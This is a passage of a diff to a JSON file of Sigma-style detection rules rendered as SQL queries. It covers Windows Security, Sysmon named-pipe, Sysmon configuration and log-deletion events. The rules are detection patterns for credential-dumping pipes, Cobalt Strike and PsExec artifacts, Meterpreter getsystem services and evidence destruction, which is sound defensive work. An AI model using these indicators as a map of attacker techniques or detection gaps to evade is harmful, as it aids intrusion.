OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "Detects suspicious processes logging on with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ], - "falsepositives": [ - "User using a disabled account" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" - ], - "filename": "win_security_susp_failed_logon_reasons.yml" - }, - { - "title": "Windows Network Access Suspicious desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "WMI Persistence - Security", - "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "status": "test", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", "attack.t1569.002" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" ], - "filename": "win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1039" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" + "Legitimate Administrator using tool for password recovery" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Highly unlikely" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of SDelete" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", - "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "There are no known false positives at this time" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "status": "experimental", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", "status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Remote Task Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "status": "experimental", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the IIS service", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": "file_delete_win_delete_iis_access_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ 